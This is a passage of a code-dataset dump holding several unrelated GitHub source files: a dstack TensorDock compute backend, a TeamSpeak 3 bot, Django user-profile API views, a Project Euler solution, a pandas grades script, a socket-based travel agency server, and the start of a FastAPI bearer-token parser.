config.creds.api_token)\n\n def get_offers(\n self, requirements: Optional[Requirements] = None\n ) -> List[InstanceOfferWithAvailability]:\n offers = get_catalog_offers(\n backend=BackendType.TENSORDOCK,\n requirements=requirements,\n )\n offers = [\n InstanceOfferWithAvailability(\n **offer.dict(), availability=InstanceAvailability.AVAILABLE\n )\n for offer in offers\n ]\n return offers\n\n def run_job(\n self,\n run: Run,\n job: Job,\n instance_offer: InstanceOfferWithAvailability,\n project_ssh_public_key: str,\n project_ssh_private_key: str,\n ) -> LaunchedInstanceInfo:\n commands = get_shim_commands(\n backend=BackendType.TENSORDOCK,\n image_name=job.job_spec.image_name,\n authorized_keys=[\n run.run_spec.ssh_key_pub.strip(),\n project_ssh_public_key.strip(),\n ],\n registry_auth_required=job.job_spec.registry_auth is not None,\n )\n try:\n resp = self.api_client.deploy_single(\n instance_name=job.job_spec.job_name,\n instance=instance_offer.instance,\n cloudinit={\n \"ssh_pwauth\": False, # disable password auth\n \"users\": [\n \"default\",\n {\n \"name\": \"user\",\n \"ssh_authorized_keys\": [\n run.run_spec.ssh_key_pub.strip(),\n project_ssh_public_key.strip(),\n ],\n },\n ],\n \"runcmd\": [\n [\"sh\", \"-c\", \" && \".join(commands)],\n ],\n \"write_files\": [\n {\n \"path\": \"/etc/docker/daemon.json\",\n \"content\": json.dumps(\n {\n \"runtimes\": {\n \"nvidia\": {\n \"path\": \"nvidia-container-runtime\",\n \"runtimeArgs\": [],\n }\n },\n \"exec-opts\": [\"native.cgroupdriver=cgroupfs\"],\n }\n ),\n }\n ],\n },\n )\n except requests.HTTPError as e:\n logger.warning(\"Got error from tensordock: %s\", e)\n raise NoCapacityError()\n return LaunchedInstanceInfo(\n instance_id=resp[\"server\"],\n ip_address=resp[\"ip\"],\n region=instance_offer.region,\n username=\"user\",\n ssh_port={v: k for k, v in resp[\"port_forwards\"].items()}[\"22\"],\n dockerized=True,\n )\n\n def terminate_instance(\n self, instance_id: str, region: str, backend_data: Optional[str] = None\n ):\n try:\n self.api_client.delete_single(instance_id)\n except requests.HTTPError:\n 
pass\n","repo_name":"dstackai/dstack","sub_path":"src/dstack/_internal/core/backends/tensordock/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":859,"dataset":"github-code","pt":"43"} +{"seq_id":"9274776743","text":"import configparser\nimport logging\nimport os\nfrom distutils.util import strtobool\n\nimport ts3API.TS3Connection\nfrom ts3API.TS3Connection import TS3QueryException\nfrom ts3API.TS3QueryExceptionType import TS3QueryExceptionType\n\nimport CommandHandler\nimport EventHandler\nimport Moduleloader\n\n\ndef stop_conn(ts3conn):\n ts3conn.stop_recv.set()\n\n\ndef send_msg_to_client(ts3conn, clid, msg):\n \"\"\"\n Convenience method for sending a message to a client without having a bot object.\n :param ts3conn: TS3Connection to send message on.\n :type ts3conn: ts3API.TS3Connection\n :param clid: Client id of the client to send too.\n :type clid: int\n :param msg: Message to send\n :type msg: str\n :return:\n \"\"\"\n try:\n ts3conn.sendtextmessage(targetmode=1, target=clid, msg=msg)\n except ts3API.TS3Connection.TS3QueryException:\n logger = logging.getLogger(\"bot\")\n logger.exception(\"Error sending a message to clid \" + str(clid))\n\n\nclass Ts3Bot:\n \"\"\"\n Teamspeak 3 Bot with module support.\n \"\"\"\n def get_channel_id(self, name):\n \"\"\"\n Covenience method for getting a channel by name.\n :param name: Channel name to search for, can be a pattern\n :type name: str\n :return: Channel id of the first channel found\n :rtype: int\n \"\"\"\n ret = self.ts3conn.channelfind(pattern=name)\n return int(ret[0][\"cid\"])\n\n @staticmethod\n def bot_from_config(config):\n \"\"\"\n Create a bot from the values parsed from config.ini\n :param config: a configuration for the bot\n :type config: dict\n :return: Created Bot\n :rtype: Ts3Bot\n \"\"\"\n logger = logging.getLogger(\"bot\")\n plugins = config\n config = config.pop('General')\n return Ts3Bot(logger=logger, plugins=plugins, **config)\n\n @staticmethod\n def parse_config(logger):\n \"\"\"\n Parse the config file config.ini\n :param logger: Logger to log errors to.\n :return: Dictionary containing options necessary to create a new bot\n :rtype: dict[str, dict[str, str]]\n \"\"\"\n config = configparser.ConfigParser()\n if len(config.read('config.ini')) == 0:\n logger.error(\"Config file missing!\")\n exit()\n if not config.has_section('General'):\n logger.error(\"Config file is missing general section!\")\n exit()\n if not config.has_section('Plugins'):\n logger.error(\"Config file is missing plugins section\")\n exit()\n return config._sections\n\n def connect(self):\n \"\"\"\n Connect to the server specified by self.host and self.port.\n :return:\n \"\"\"\n try:\n self.ts3conn = ts3API.TS3Connection.TS3Connection(self.host, self.port,\n use_ssh=self.is_ssh, username=self.user,\n password=self.password, accept_all_keys=self.accept_all_keys,\n host_key_file=self.host_key_file,\n use_system_hosts=self.use_system_hosts, sshtimeout=self.sshtimeout, sshtimeoutlimit=self.sshtimeoutlimit)\n # self.ts3conn.login(self.user, self.password)\n except ts3API.TS3Connection.TS3QueryException:\n self.logger.exception(\"Error while connecting, IP propably not whitelisted or Login data wrong!\")\n # This is a very ungraceful exit!\n os._exit(-1)\n raise\n\n def setup_bot(self):\n \"\"\"\n Setup routine for new bot. Does the following things:\n 1. Select virtual server specified by self.sid\n 2. 
Set bot nickname to the Name specified by self.bot_name\n 3. Move the bot to the channel specified by self.default_channel\n 4. Register command and event handlers\n :return:\n \"\"\"\n try:\n self.ts3conn.use(sid=self.sid)\n except ts3API.TS3Connection.TS3QueryException:\n self.logger.exception(\"Error on use SID\")\n exit()\n try:\n try:\n self.ts3conn.clientupdate([\"client_nickname=\" + self.bot_name])\n except TS3QueryException as e:\n if e.type == TS3QueryExceptionType.CLIENT_NICKNAME_INUSE:\n self.logger.info(\"The choosen bot nickname is already in use, keeping the default nickname\")\n else:\n raise e\n try:\n self.channel = self.get_channel_id(self.default_channel)\n self.ts3conn.clientmove(self.channel, int(self.ts3conn.whoami()[\"client_id\"]))\n except TS3QueryException as e:\n if e.type == TS3QueryExceptionType.CHANNEL_ALREADY_IN:\n self.logger.info(\"The bot is already in the configured default channel\")\n else:\n raise e\n except TS3QueryException:\n self.logger.exception(\"Error on setting up client\")\n self.ts3conn.quit()\n return\n self.command_handler = CommandHandler.CommandHandler(self.ts3conn)\n self.event_handler = EventHandler.EventHandler(ts3conn=self.ts3conn, command_handler=self.command_handler)\n try:\n self.ts3conn.register_for_server_events(self.event_handler.on_event)\n self.ts3conn.register_for_channel_events(0, self.event_handler.on_event)\n self.ts3conn.register_for_private_messages(self.event_handler.on_event)\n except ts3API.TS3Connection.TS3QueryException:\n self.logger.exception(\"Error on registering for events.\")\n exit()\n\n def __del__(self):\n if self.ts3conn is not None:\n self.ts3conn.quit()\n\n def __init__(self, host, port, serverid, user, password, defaultchannel, botname, logger, plugins, ssh=\"False\",\n acceptallsshkeys=\"False\", sshhostkeyfile=None, sshloadsystemhostkeys=\"False\", sshtimeout=None, sshtimeoutlimit=3, *_, **__):\n \"\"\"\n Create a new Ts3Bot.\n :param host: Host to connect to, can be a IP or a host name\n :param port: Port to connect to\n :param sid: Virtual Server id to use\n :param user: Server Query Admin Login Name\n :param password: Server Query Admin Password\n :param default_channel: Channel to move the bot to\n :param bot_name: Nickname of the bot\n :param logger: Logger to use throughout the bot\n \"\"\"\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.sid = serverid\n self.default_channel = defaultchannel\n self.bot_name = botname\n self.event_handler = None\n self.command_handler = None\n self.channel = None\n self.logger = logger\n self.ts3conn = None\n self.is_ssh = bool(strtobool(ssh))\n # Strtobool returns 1/0 ...\n self.accept_all_keys = bool(strtobool(acceptallsshkeys))\n self.host_key_file = sshhostkeyfile\n self.use_system_hosts = bool(strtobool(sshloadsystemhostkeys))\n self.sshtimeout = sshtimeout\n self.sshtimeoutlimit = sshtimeoutlimit\n\n self.connect()\n self.setup_bot()\n # Load modules\n Moduleloader.load_modules(self, plugins)\n self.ts3conn.start_keepalive_loop()\n","repo_name":"Murgeye/teamspeak3-python-bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"43"} +{"seq_id":"72430971009","text":"import datetime\nimport logging\n\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom drf_yasg.utils import swagger_auto_schema\nfrom rest_framework import generics\nfrom rest_framework.response import 
Response\nfrom rest_framework.views import APIView\n\nfrom core.apps.common.common_functions import (\n cache_data,\n clear_user_cache_with_prefix,\n pillar_response,\n pro_feature,\n)\nfrom core.apps.common.const import USER_UTP_SETTINGS_QUEUE_PRIORITIES\nfrom core.apps.common.enums.service_enum import ServiceType\nfrom core.apps.common.pillar_responses import PillarResponse\nfrom core.apps.common.utils import (\n get_user_from_session_destroy_session_variable,\n log_extra_fields,\n make_context,\n)\nfrom core.apps.packages.tasks import create_package_plan\nfrom core.apps.packages.utils import create_user_knowledge_hub_entries\nfrom core.apps.plan.models import UserPlan\nfrom core.apps.plan.tasks import create_plan\nfrom core.apps.utp.utils import update_utp_settings\n\nfrom ....avatar import get_avatar\nfrom ....models import ProfileImage, UserActivityLog, UserProfile\nfrom ....services import AddNewGoalService, save_goal_data\nfrom ....utils import clear_trainer_cache\nfrom .schema import (\n CreateTrainingPlanV2SchemaView,\n UserAvailabilityDataV2ViewSchema,\n UserBasicInfoV2ViewSchema,\n UserFileProcessInfoV2ViewSchema,\n UserFitnessInfoExistV2ViewSchema,\n UserFitnessInfoV2ViewSchema,\n UserOnboardingViewSchema,\n UserSupportSchemaView,\n)\nfrom .services import UserProfileServiceV2, UserSupportServiceV2\n\nlogger = logging.getLogger(__name__)\n\n\nclass UserBasicInfoViewV2(APIView):\n \"\"\"Return user basic info like email, joining date etc.\"\"\"\n\n success_msg = \"Returned User Basic Info Successfully\"\n error_msg = \"Could not return User Basic Info\"\n\n @swagger_auto_schema(\n tags=UserBasicInfoV2ViewSchema.tags,\n responses=UserBasicInfoV2ViewSchema.responses,\n )\n @cache_data\n @pillar_response()\n def get(self, request, **kwargs):\n user_id = request.session[\"user_id\"]\n response_data = UserProfileServiceV2(user_id=user_id).get_basic_info()\n cache.set(kwargs[\"cache_key\"], response_data, timeout=settings.CACHE_TIME_OUT)\n return response_data\n\n @pillar_response()\n def post(self, request):\n user_id = request.session[\"user_id\"]\n timezone = request.data.get(\"timezone\")\n UserProfileServiceV2(user_id=user_id).update_basic_info(\n timezone_id=timezone.get(\"timezone_id\") if timezone else None,\n weight=request.data.get(\"weight\"),\n )\n clear_user_cache_with_prefix(user_id + \"&\" + request.path, user_id)\n\n\nclass UserFitnessInfoViewV2(APIView):\n \"\"\"Return user fitness data like ftp, fthr etc.\"\"\"\n\n success_msg = \"Returned User fitness data Successfully\"\n error_msg = \"Could not return User fitness data\"\n\n @swagger_auto_schema(\n tags=UserFitnessInfoV2ViewSchema.tags,\n responses=UserFitnessInfoV2ViewSchema.responses,\n )\n @cache_data\n @pillar_response()\n def get(self, request, **kwargs):\n user_id = request.session[\"user_id\"]\n response_data = UserProfileServiceV2(user_id=user_id).get_current_fitness_data(\n calculate_mhr_from_age=False\n )\n cache.set(kwargs[\"cache_key\"], response_data, timeout=settings.CACHE_TIME_OUT)\n return response_data\n\n @pillar_response()\n def post(self, request):\n user_id = request.session[\"user_id\"]\n UserProfileServiceV2(user_id=user_id).save_fitness_info(\n ftp=request.data.get(\"ftp\"),\n fthr=request.data.get(\"fthr\"),\n mhr=request.data.get(\"mhr\"),\n )\n clear_user_cache_with_prefix(prefix=user_id, user_id=user_id)\n clear_trainer_cache(user_id)\n\n\nclass UserFitnessInfoExistViewV2(APIView):\n \"\"\"Check user fitness data like ftp, fthr etc. 
exist or not\"\"\"\n\n success_msg = \"Returned User fitness exist info Successfully\"\n error_msg = \"Could not return User fitness data exist info\"\n\n @swagger_auto_schema(\n tags=UserFitnessInfoExistV2ViewSchema.tags,\n request_body=UserFitnessInfoExistV2ViewSchema.request_schema,\n responses=UserFitnessInfoExistV2ViewSchema.responses,\n )\n @cache_data\n def post(self, request, cache_key):\n user_id = request.session[\"user_id\"]\n activity_datetime_str = request.data.get(\"activity_datetime\")\n try:\n response_data = UserProfileServiceV2(\n user_id=user_id\n ).baseline_fitness_exist(activity_datetime_str)\n\n error, message = False, self.success_msg\n cache.set(cache_key, response_data, timeout=settings.CACHE_TIME_OUT)\n except Exception as e:\n logger.exception(\n self.error_msg,\n extra=log_extra_fields(\n exception_message=str(e),\n request_url=request.path,\n user_id=user_id,\n service_type=ServiceType.API.value,\n ),\n )\n error, message, response_data = True, self.error_msg, None\n return Response(make_context(error=error, message=message, data=response_data))\n\n\nclass UserFileProcessInfoViewV2(APIView):\n \"\"\"Return user file process info\"\"\"\n\n success_msg = \"Returned User file process info Successfully\"\n error_msg = \"Could not return User file process info\"\n\n @swagger_auto_schema(\n tags=UserFileProcessInfoV2ViewSchema.tags,\n request_body=UserFileProcessInfoV2ViewSchema.request_schema,\n responses=UserFileProcessInfoV2ViewSchema.responses,\n )\n @cache_data\n def post(self, request, cache_key):\n user_id = request.session[\"user_id\"]\n activity_datetime_str = request.data.get(\"activity_datetime\")\n try:\n response_data = UserProfileServiceV2(user_id=user_id).get_file_process_info(\n activity_datetime_str\n )\n\n error, message = False, self.success_msg\n cache.set(cache_key, response_data, timeout=settings.CACHE_TIME_OUT)\n except Exception as e:\n logger.exception(\n self.error_msg,\n extra=log_extra_fields(\n exception_message=str(e),\n request_url=request.path,\n user_id=user_id,\n service_type=ServiceType.API.value,\n ),\n )\n error, message, response_data = True, self.error_msg, None\n return Response(make_context(error=error, message=message, data=response_data))\n\n\nclass UserTimezoneDataViewV2(APIView):\n \"\"\"Return user timezone data like timezone name, offset etc.\"\"\"\n\n success_msg = \"Returned data successfully\"\n error_msg = \"Could not return User timezone data\"\n\n @swagger_auto_schema(responses=UserAvailabilityDataV2ViewSchema.responses)\n @cache_data\n def get(self, request, cache_key):\n user_id = request.session[\"user_id\"]\n try:\n response_data = UserProfileServiceV2.get_timezone_data()\n data = {\"timezones\": response_data}\n\n cache.set(cache_key, data, timeout=settings.CACHE_TIME_OUT)\n return Response(make_context(message=self.success_msg, data=data))\n except Exception as e:\n logger.exception(\n self.error_msg,\n extra=log_extra_fields(\n exception_message=str(e),\n request_url=request.path,\n user_id=user_id,\n service_type=ServiceType.API.value,\n ),\n )\n return Response(make_context(error=True, message=self.error_msg))\n\n\nclass UserProfileInfoViewV2(generics.GenericAPIView):\n @cache_data\n @pillar_response()\n def get(self, request, **kwargs):\n user_id = request.session[\"user_id\"]\n logger.info(\"Fetching user profile data\")\n user_profile = UserProfile.objects.filter(\n user_id=user_id, is_active=True\n ).last()\n logger.info(\"Fetching profile image data\")\n profile_image = ProfileImage.objects.filter(\n 
user_id=user_id, is_active=True\n ).first()\n profile_image_url = profile_image.avatar.url if profile_image else get_avatar()\n\n response_data = {\n \"full_name\": user_profile.full_name,\n \"first_name\": user_profile.name,\n \"avatar\": profile_image_url,\n \"threshold_graph_start_date\": 1,\n }\n cache.set(kwargs[\"cache_key\"], response_data, timeout=settings.CACHE_TIME_OUT)\n\n return response_data\n\n\nclass UserOnboardingView(generics.GenericAPIView):\n activity_code = UserActivityLog.ActivityCode.USER_ONBOARDING\n\n @swagger_auto_schema(\n tags=UserOnboardingViewSchema.tags,\n request_body=UserOnboardingViewSchema.request_schema,\n responses=UserOnboardingViewSchema.responses,\n )\n @pillar_response(activity_code)\n def post(self, request):\n \"\"\"Gets the onboarding data of a new user and saves them\"\"\"\n logger.info(\"Onboarding API called\")\n user_id = request.session[\"user_id\"]\n logger.info(f\"{str(user_id)}\")\n\n try:\n response = UserProfileServiceV2.save_user_onboarding_data(\n user_id, request.data\n )\n except Exception as e:\n failed_msg = \"Could not save onboarding data\"\n logger.exception(\n failed_msg,\n extra=log_extra_fields(\n user_id=user_id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, failed_msg, None)\n return response\n\n\nclass UserPortalOnboardingView(generics.GenericAPIView):\n def post(self, request):\n \"\"\"Gets the portal onboarding data of a new user and saves them\"\"\"\n logger.info(\"Portal Onboarding API called\")\n user_id = request.session[\"user_id\"]\n logger.info(f\"{str(user_id)}\")\n\n try:\n response = UserProfileServiceV2.save_user_portal_onboarding_data(\n user_id, request.data\n )\n except Exception as e:\n logger.exception(\n \"Could not save portal onboarding data\",\n extra=log_extra_fields(\n user_id=user_id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, \"Could not save onboarding data\", None)\n # TODO seems PillarResponse is not working. 
Test with PillarResponse and replace Response with confirmation\n # return PillarResponse(user_id, request, response, self.activity_code)\n return Response(response)\n\n\nclass CreateTrainingPlanViewV2(APIView):\n \"\"\"\n This api is for creating user training plan with given profile data.\n \"\"\"\n\n no_user_found_msg = \"You are not allowed to create plan\"\n data_missing_msg = \"Some data needed to create plan are missing\"\n success_message = \"Saved goal data and created training plan successfully\"\n\n @swagger_auto_schema(\n request_body=CreateTrainingPlanV2SchemaView.request_schema,\n responses=CreateTrainingPlanV2SchemaView.responses,\n )\n @pro_feature\n def post(self, request):\n user = get_user_from_session_destroy_session_variable(request)\n user_event_data = request.data.get(\"event_data\")\n user_package_data = request.data.get(\"package_data\")\n user_schedule_data = request.data.get(\"schedule_data\")\n ctp_activity_code = UserActivityLog.ActivityCode.CREATE_TRAINING_PLAN\n try:\n if user_event_data and user_package_data:\n error_message = \"Invalid user goal info\"\n logger.error(\n error_message,\n extra=log_extra_fields(\n user_id=user.code,\n user_auth_id=user.id,\n request_url=request.path,\n service_type=ServiceType.API.value,\n ),\n )\n response = make_context(True, error_message, None)\n return PillarResponse(user, request, response, ctp_activity_code)\n\n user_local_date = user.user_local_date\n if UserPlan.objects.filter(\n user_id=user.code, is_active=True, end_date__gte=user_local_date\n ).exists():\n error_message = \"Current goal has not been completed yet\"\n logger.error(\n error_message,\n extra=log_extra_fields(\n user_id=user.code,\n user_auth_id=user.id,\n request_url=request.path,\n service_type=ServiceType.API.value,\n ),\n )\n response = make_context(True, error_message, None)\n return PillarResponse(user, request, response, ctp_activity_code)\n\n if user.user_plans.filter(is_active=True).exists():\n # If there was a previous goal of the user and it was completed,\n # then goal is created according to the add new goal flow. 
This is\n # different from the flow that is followed when creating the first goal\n return AddNewGoalService(request, user).add_new_goal()\n\n if not user:\n logger.info(\"No allowed user found for create training plan request\")\n return PillarResponse(\n user,\n request,\n make_context(True, self.no_user_found_msg, None),\n ctp_activity_code,\n )\n\n extra_log_fields = log_extra_fields(\n user_auth_id=user.id,\n service_type=ServiceType.API.value,\n request_url=request.path,\n )\n\n if not (user_event_data or user_package_data) or not user_schedule_data:\n logger.info(\n \"Some data needed to create plan are missing\",\n extra=extra_log_fields,\n )\n return PillarResponse(\n user,\n request,\n make_context(True, self.data_missing_msg, None),\n ctp_activity_code,\n )\n\n goal_data_saved, message = save_goal_data(user, request)\n\n if not goal_data_saved:\n return PillarResponse(\n user, request, make_context(True, message, None), ctp_activity_code\n )\n\n update_utp_settings(\n user,\n True,\n USER_UTP_SETTINGS_QUEUE_PRIORITIES[2],\n datetime.datetime.now() + datetime.timedelta(hours=48),\n reason=\"48 hour rule\",\n )\n\n update_utp_settings(\n user,\n user.is_third_party_connected(),\n USER_UTP_SETTINGS_QUEUE_PRIORITIES[3],\n datetime.datetime.now(),\n reason=\"\",\n )\n logger.info(\n \"Updated UTP settings during create training plan\",\n extra=extra_log_fields,\n )\n\n if user_event_data:\n create_plan(user)\n if user_package_data:\n package_id = user_package_data.get(\"id\")\n user_package_duration = user_package_data.get(\"total_weeks\")\n create_package_plan(user.code, package_id, user_package_duration)\n create_user_knowledge_hub_entries(user, package_id)\n response = make_context(False, self.success_message, None)\n\n except Exception as e:\n msg = \"Could not create training plan\"\n logger.exception(\n msg,\n extra=log_extra_fields(\n user_auth_id=user.id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, msg, None)\n\n return PillarResponse(user, request, response, ctp_activity_code)\n\n\nclass UserSupportView(APIView):\n \"\"\"This api is for creating user support ticket\"\"\"\n\n @swagger_auto_schema(\n tags=UserSupportSchemaView.tags,\n request_body=UserSupportSchemaView.request_schema,\n responses=UserSupportSchemaView.responses,\n )\n def post(self, request):\n success_msg = \"User support request submitted successfully\"\n error_msg = \"Could not submit user support request\"\n user_support_activity_code = UserActivityLog.ActivityCode.USER_SUPPORT_REQUEST\n\n \"\"\"\n post user support message to notion and slack\n \"\"\"\n user_id = request.session[\"user_id\"]\n log_extra_data = log_extra_fields(\n user_id=user_id,\n service_type=ServiceType.API.value,\n request_url=request.path,\n )\n\n try:\n UserSupportServiceV2.post_user_support_message(request)\n logger.info(success_msg, extra=log_extra_data)\n response = make_context(False, success_msg, None)\n except Exception as e:\n logger.exception(\n error_msg,\n extra=log_extra_fields(\n user_id=user_id,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n request_url=request.path,\n ),\n )\n response = make_context(True, error_msg, None)\n\n # file can't be stored in activity log\n if request.data.get(\"file\") is not None:\n request.data.pop(\"file\")\n if request.data.get(\"user_log\") is not None:\n request.data.pop(\"user_log\")\n\n return PillarResponse(\n user_id=user_id,\n request=request,\n data=response,\n 
activity_code=user_support_activity_code,\n )\n","repo_name":"yass-arafat/code-samples","sub_path":"core/apps/user_profile/api/versioned/v2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36859034608","text":"from itertools import permutations\nfrom utils import *\n\n\nnbinco = 3\nfor i in range(999):\n\tstri = str(i) + 'X' * nbinco + '0' * (nbinco - len(str(i)))\n\tfor perm in permutations(stri):\n\t\tnbperm = 0\n\t\tfor j in range(10):\n\t\t\tisprim = int(''.join(perm).replace('X', str(j)))\n\t\t\tif isprim > 10000 and is_prime(isprim):\n\t\t\t\tnbperm += 1\n\t\tif nbperm == 8:\n\t\t\tprint(\"8 permutations: %s \" % (''.join(perm)))\n\t\t\texit()","repo_name":"AFeuillet/CodingGames","sub_path":"Euler/051.py","file_name":"051.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41628593030","text":"import pandas as pd\nfrom requestsData import request_students_in_data_frame\nfrom requestsData import request_students\n\ndef search_the_best_course_by_gpa():\n course_average = request_students()\n print(course_average)\n sorted_course_average = sorted(course_average, key=lambda item: item[list(item.keys())[0]], reverse=True)\n\n print('\\nThe best course by medium score:')\n print(sorted_course_average[0])\n\nsearch_the_best_course_by_gpa()\n\n### <---\n\nstudent_data_frame = request_students_in_data_frame()\n\n### <---\n\ndef save_to_csv(data: pd.DataFrame):\n data.to_csv('data.csv')\n\n### <---\n\ndef search_mid_value(data: pd.DataFrame):\n print(\"Enter the grade mid\")\n value_for_search = float(input())\n student_id = data[\"gradeMid\"].sub(value_for_search).abs().idxmin()\n print(data.iloc[[student_id]])\n\n### <---\n\nsave_to_csv(student_data_frame)\nsearch_mid_value(student_data_frame)","repo_name":"Gre7/PythonHSE","sub_path":"lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40484538723","text":"import socket\r\nimport pickle\r\nfrom threading import Thread\r\n\r\n# NOTE = Sections where a code reviewer found something that needs\r\n# discussion or further investigation.\r\n\r\n# XXX = warning about possible pitfalls, can be used as NOTE:XXX\r\n\r\n# HACK = not very well written or malformed code to circumvent problem/\r\n# bug should be used as HACK:FIXME:\r\n\r\n# FIXME = this works, sort of, but it could be done better.\r\n\r\n# BUG = there is a problem here.\r\n\r\n# TODO = no problem, but additional code needs to be written,\r\n# usually when you are skipping something\r\n\r\n# NOTE - Burada airline server tarafına HTTP GET mesajı atıyoruz.\r\ndef client_accept_airline_conn(company_name):\r\n\r\n message = \"GET /{}/flights HTTP/1.1\" + \" \" \\\r\n \"params: {} {} {} {}\"\\\r\n .format(company_name, start_date, flight_from, flight_to)\r\n\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client.connect((socket.gethostname(), 12344))\r\n client.send(message.encode())\r\n\r\n client_receive_airline(client)\r\n\r\n# NOTE:XXX - Burada serverdan gelen query sonucunu alcak ve\r\n# gelen sonucu gui tarafına gönderecek.\r\ndef client_receive_airline(sock):\r\n \"\"\" Handles receiving messages from server \"\"\"\r\n try:\r\n all_message = sock.recv(512)\r\n message_list = 
pickle.loads(all_message)\r\n print(message_list[0]) # HTTP/1.1 OK\r\n\r\n for item in message_list[1]:\r\n print(item[0])\r\n\r\n except OSError: # client has left\r\n print(OSError)\r\n\r\n# NOTE - Burada hotel server tarafına HTTP GET mesajı atıyoruz.\r\ndef client_accept_hotel_conn(hotel_name):\r\n message = \"GET /{}/available_rooms HTTP/1.1\" + \" \" \\\r\n \"params: {} {} {} {}\" \\\r\n .format(hotel_name, flight_to, start_date, return_date)\r\n\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client.connect((socket.gethostname(), 12345))\r\n client.send(message.encode())\r\n\r\n client_receive_hotels(client)\r\n\r\n# NOTE:XXX - Burada serverdan gelen query sonucunu alcak ve\r\n# gelen sonucu gui tarafına gönderecek.\r\ndef client_receive_hotels(sock):\r\n \"\"\" Handles receiving messages from server \"\"\"\r\n try:\r\n all_message = sock.recv(512)\r\n message_list = pickle.loads(all_message)\r\n print(message_list[0]) # HTTP/1.1 OK\r\n\r\n for item in message_list[1]:\r\n print(item[0])\r\n\r\n except OSError: # client has left\r\n print(OSError)\r\n\r\n\r\n# NOTE - Burası gelen client isteklerini ilk karşıladığımız yer.\r\naddresses = {}\r\ndef server_accept_conn():\r\n while True:\r\n conn, addr = server.accept()\r\n print(\"{} has connected.\".format(addr))\r\n addresses[conn] = addr\r\n Thread(target=server_handle_client, args=(conn, addr)).start()\r\n\r\n# NOTE - Client tarafından gelen mesajları dinlediğimiz yer.\r\ndef server_handle_client(conn, address):\r\n while True:\r\n try:\r\n message = conn.recv(512).decode() # Clienttan mesajı aldık\r\n start_date = message.split()[0]\r\n return_date = message.split()[1]\r\n number_of_people = message.split()[2]\r\n pref_hotels = message.split()[3]\r\n pref_airline = message.split()[4]\r\n flight_from = message.split()[5]\r\n flight_to = message.split()[6]\r\n\r\n client_accept_airline_conn(\"turkish_airlines\")\r\n client_accept_airline_conn(\"pegasus_airlines\")\r\n client_accept_hotel_conn(\"ceasers_palace\")\r\n client_accept_hotel_conn(\"divan_hotel\")\r\n conn.send(message.encode())\r\n #client = socket.socket()\r\n except OSError:\r\n print(\"{} has left.\".format(address))\r\n break\r\n conn.close()\r\n\r\n\r\nPORT = 6000\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.bind((socket.gethostname(), PORT))\r\nserver.listen()\r\nstart_date = \"\"; return_date = \"\"; number_of_people = \"\"\r\npref_hotels = \"\"; pref_airline = \"\"\r\nflight_from = \"\"; flight_to = \"\"\r\nserver_thread = Thread(target=server_accept_conn).start()\r\n","repo_name":"muhammetseramet/School-Projects","sub_path":"computer networks/project/agency.py","file_name":"agency.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"20297323433","text":"from time import sleep\n\nprint(\"-\" * 20, \"GERADOR DE PA 3.0\", \"-\" * 20)\n\nprimeiro_termo = int(input(\"Digite o primeiro termo da progressão aritmética: \\n\"))\nrazao = int(input(\"Agora digite a razão: \\n\"))\nwhile razao == 0:\n razao = int(input(\"A razão não pode ser 0. 
Por favor, digite outro valor: \\n\"))\nnumeroTermos = 10\ncontador = 1\ntermos = []\n\nwhile True:\n while contador <= numeroTermos:\n termo = primeiro_termo + (contador - 1) * razao\n contador += 1\n termos.append(termo)\n if contador == numeroTermos:\n print(f\"A progressão aritmética é: {', '.join(map(str, termos))}.\", end=\" \")\n sleep(2)\n mais = int(input(\"\\nQuantos termos deseja adicionar a progressão?\\n\"))\n if mais == 0:\n print(\"Obrigado por utilizar meu programa.\")\n print(f\"A PA teve {numeroTermos} termos.\")\n break\n else:\n numeroTermos += mais\n","repo_name":"hamiltonGomes/learning_python","sub_path":"Exercícios - Mundo 2/while/progressao_aritmetica3.0.py","file_name":"progressao_aritmetica3.0.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"8994567389","text":"from app.clients.bifrost.admin import BifrostService, ResourceNotFoundError\nfrom app.clients.bifrost.validate import validate\nfrom app.context import Context\nfrom app.exception import AppException\nfrom app.filter import FilterWithSchema\nfrom ddtrace import tracer\nfrom fastapi import Request\nfrom jsonschema import ValidationError\n\nimport app.openapi\nimport jsonschema\nimport re\nimport time\n\n\nbifrostService = BifrostService()\n\nspec = app.openapi.load()\nif spec is None: \n raise Exception(\"Could not load openapi spec in thumbnail.py\")\n\nfilter = FilterWithSchema(spec)\n\ndef get_token(request_obj: Request) -> str:\n \"\"\"Extracts the jwt from the http headers. Format must be Authorization: bearer JWT\n\n Args:\n request_obj (Request): http request\n\n Returns:\n str: The encoded jwt\n \"\"\"\n\n auth_header = request_obj.headers.get(\"Authorization\", \"\")\n if not auth_header:\n raise AppException('missing', event='Auth.Headers', status_code=401)\n header_split: str = auth_header.split(\" \")\n if len(header_split) != 2:\n raise AppException('incorrect length', event='Auth.Headers', status_code=401)\n\n if header_split[0].lower() != \"bearer\":\n raise AppException('no bearer', event='Auth.Headers', status_code=401)\n \n 